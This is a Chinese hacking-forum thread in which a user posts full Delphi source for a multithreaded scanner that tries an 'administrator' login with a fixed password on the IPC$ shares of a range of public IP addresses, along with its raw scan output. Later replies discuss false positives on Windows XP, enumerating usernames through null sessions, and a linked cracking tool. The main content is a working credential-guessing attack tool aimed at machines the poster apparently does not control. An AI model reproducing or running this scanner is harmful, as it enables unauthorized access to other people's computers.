论坛: 编程破解 标题: 问个IPC扫描的问题。 复制本贴地址    
作者: yulihu [yulihu]    论坛用户   登录
program Project1;

{$APPTYPE CONSOLE}

uses
SysUtils,
windows,
Winsock;
Var
StartIp :DWORD;
EndIp :DWORD;
LoopIP :DWORD;
dwScanThreadId :DWORD;
IpcThreadNumber :integer;
Const
MAX_THREAD=70;

function ScanPassOfIPC(PcIp:Pointer):Boolean;Stdcall;
var
NetReSource : TNetReSource;
//PcName,PcPass :pchar;
ScanIP :integer;
StrIp :String;
server_address:sockaddr_in;
begin
ScanIP :=Integer(PcIP);
server_address.sin_addr.S_addr:=htonl(ScanIp);
StrIp:='\\'+ inet_ntoa(server_address.sin_addr)+'\ipc$';
ZeroMemory(@NetReSource,SizeOf(NetReSource));
With NetReSource do Begin
dwScope := RESOURCE_GLOBALNET;
dwType := RESOURCETYPE_ANY;
lpLocalName :='';
lpRemoteName :=pchar(StrIp);
lpProvider :=Nil;
End;
if (WNetAddConnection2(NetReSource,'mmbest','administrator', 0) = NO_ERROR)
then WriteLn(StrIp+'Open');
Result:=TRUE;
if ( WNetCancelConnection2(pchar(StrIP),0,TRUE) = NO_ERROR )
then Writeln('delED') ;
if ( IpcThreadNumber > 0 ) then dec(IpcThreadNumber);
end;




begin
IpcThreadNumber:=0;
StartIP:=ntohl(inet_addr('219.222.99.1'));
EndIP:=ntohl(inet_addr('219.222.100.100'));

for LoopIp:=startip to EndIP do BEGIN
While (TRUE) do Begin
if IpcThreadNumber > MAX_THREAD then BEgin
WriteLn('Thread bigger than 70');
sleep(2000);
ENd else
Break;
End;
if ( CreateThread(Nil,0,@ScanPassOfIPC,Pointer(LoopIP),0,dwScanThreadId)<> 0 )then
Begin
inc(IpcThreadNumber);
WriteLn(inttostr(IpcThreadNumber)+'th');
End;
END;
sleep(90000);

end.






地主 发表时间: 10/11 19:44
回复: yulihu [yulihu]   论坛用户   登录
1th
2th
3th
4th
5th
6th
7th
8th
9th
10th
11th
12th
13th
14th
15th
16th
17th
18th
19th
20th
21th
22th
23th
24th
25th
26th
27th
28th
29th
30th
31th
32th
33th
34th
35th
36th
37th
38th
39th
40th
41th
42th
43th
44th
45th
46th
47th
48th
49th
50th
51th
52th
53th
54th
55th
56th
57th
58th
59th
60th
61th
62th
63th
64th
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
\\192.168.99.6\ipc$Open
delED
\\192.168.99.18\ipc$Open
delED
\\192.168.99.47\ipc$Open
delED
64th
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
\\192.168.99.42\ipc$Open
delED
\\192.168.99.54\ipc$Open
delED
\\192.168.99.69\ipc$Open
delED
66th
67th
68th
69th
70th
71th
Thread bigger than 70
70th
71th
Thread bigger than 70
69th
70th
71th
Thread bigger than 70
Thread bigger than 70
71th
Thread bigger than 70
\\192.168.99.91\ipc$Open
delED
71th
Thread bigger than 70
Thread bigger than 70
Thread bigger than 70
Thread bigger than 70
39th
40th
41th
42th
43th
44th
45th
46th
47th
48th
49th
50th
51th
52th
53th
54th
55th
56th
57th
58th
59th
60th
61th
59th
60th
61th
62th
63th
64th
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
\\192.168.99.106\ipc$Open
delED
\\192.168.99.119\ipc$Open
delED
44th
45th
46th
47th
48th
49th
50th
51th
52th
53th
54th
55th
56th
57th
58th
59th
60th
61th
62th
63th
64th
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
\\192.168.99.136\ipc$Open
delED
63th
64th
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
\\192.168.99.162\ipc$Open
delED
68th
69th
70th
71th
Thread bigger than 70
68th
69th
70th
71th
Thread bigger than 70
70th
71th
Thread bigger than 70
Thread bigger than 70
71th
Thread bigger than 70
Thread bigger than 70
Thread bigger than 70
71th
Thread bigger than 70
41th
42th
43th
44th
45th
46th
47th
48th
49th
50th
51th
52th
53th
54th
55th
56th
57th
58th
59th
60th
61th
62th
63th
64th
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
45th
46th
47th
48th
49th
50th
51th
52th
53th
54th
55th
56th
57th
58th
59th
60th
61th
62th
63th
64th
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
63th
64th
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
\\192.168.99.240\ipc$Open
delED
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
68th
69th
70th
71th
Thread bigger than 70
67th
68th
69th
70th
71th
Thread bigger than 70
71th
Thread bigger than 70
71th
Thread bigger than 70
Thread bigger than 70
Thread bigger than 70
71th
Thread bigger than 70
46th
47th
48th
49th
50th
51th
52th
53th
54th
55th
56th
57th
58th
59th
60th
61th
62th
63th
64th
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
\\192.168.100.28\ipc$Open
delED
47th
48th
49th
50th
51th
52th
53th
54th
55th
56th
57th
58th
59th
60th
61th
62th
63th
64th
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
65th
66th
67th
68th
69th
70th
71th
Thread bigger than 70
66th
67th
68th
69th
70th
71th
Thread bigger than 70
71th
Thread bigger than 70
67th
68th
69th
70th
71th
Thread bigger than 70
71th
Thread bigger than 70
71th
Thread bigger than 70
71th
Thread bigger than 70
Thread bigger than 70
71th
Thread bigger than 70
47th
48th
49th
50th
51th
52th
53th
54th
55th
56th
57th
58th
59th
60th
61th
62th
63th
64th
65th

但是我知道

B1层 发表时间: 10/11 19:46
回复: yulihu [yulihu]   论坛用户   登录
除了192.168.9.6 这台机的密码是mmbest是以mmbest为密码之外
其他的如\\192.168.100.28\ipc$Open这样的成功连接的都是误报。
有人说是WNetAddConnect2对于XP的机器连接有问题。
不知是不是真的是这样。
能告诉我20cn扫描器是如何解决的吗?
通过连接得到的是NO_ERROR之后通过能否其他服务进行操作而判定的办法可以吗?


B2层 发表时间: 10/11 19:51
回复: yulihu [yulihu]   论坛用户   登录
没人愿意看一下吗?
是不愿意回答还是没有人看还是其他原因没人回答,多多少少说明一下啊。
我等这个回答等了一个星期了。

B3层 发表时间: 10/20 10:56
回复: 286 [unique]   版主   登录
ipc扫描的原理其实是利用空用户名和口令可以列出对方用户名的功能实现的。该功能给windows nt/2000的安全带来的很大的冲击,因此xp/2003时,操作系统默认方式是不能列举出用户名。所以就不行了。
你的代码我没仔细看,不过我想可能是前一个没关闭,后一个就开始连接了吧。


B4层 发表时间: 10/21 17:24
回复: yulihu [yulihu]   论坛用户   登录
"ipc扫描的原理其实是利用空用户名和口令可以列出对方用户名的功能实现的。该功能给windows nt/2000的安全带来的很大的冲击,因此xp/2003时,操作系统默认方式是不能列举出用户名。所以就不行了。"
那为什么20cn的扫描器可以正常列举呢?用的是什么办法?
我把程序改为单线程之后误报的数据也是一样。所以应该不会是前一个扫描线程没关后一个扫描线程又开始的问题。


B5层 发表时间: 10/22 07:41
回复: 286 [unique]   版主   登录
20cn我只用过一次,好象也没见他列出用户名的功能(可能是我没注意到),只是见到他直接把属于管理员组的用户名及口令直接列出了.
你问问作者好了.

B6层 发表时间: 10/22 10:09
回复: mousewolf [mousewolf]   论坛用户   登录
呵呵~~
回答好象很牵强!!



B7层 发表时间: 10/29 23:17
回复: shesh [shesh]   版主   登录
20CN的源代码我有.

他是列出用户名的.

不分组的,具体代码我没看,你要问问和尚自己比较好.

现在有的防火墙会让你这函数异常

B8层 发表时间: 10/29 23:20
回复: 286 [unique]   版主   登录
To 无兄或和兄:
我很早以前也曾作过一个,不知为何不能扫出XP的用户名。只能扫出2000的。
原因可能与贴主原因相同。 http://www.20cn.org/~unique/Download/Program/LetMeIn.exe

B9层 发表时间: 10/30 09:22
回复: yulihu [yulihu]   论坛用户   登录
对于XP每个空连接和错误的用户和密码都会成功。
是不是因为这个得不到用户名?
空连接成功举用户名用的API是什么呢?



[此贴被 yulihu(yulihu) 在 10月30日12时01分 编辑过]

B10层 发表时间: 10/30 12:37
回复: ricky [ricky]   版主   登录
这类问题以后发到软件开发版吧

B11层 发表时间: 10/31 18:24
回复: yulihu [yulihu]   论坛用户   登录
知道了,谢谢。

B12层 发表时间: 11/02 19:44

论坛: 编程破解

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号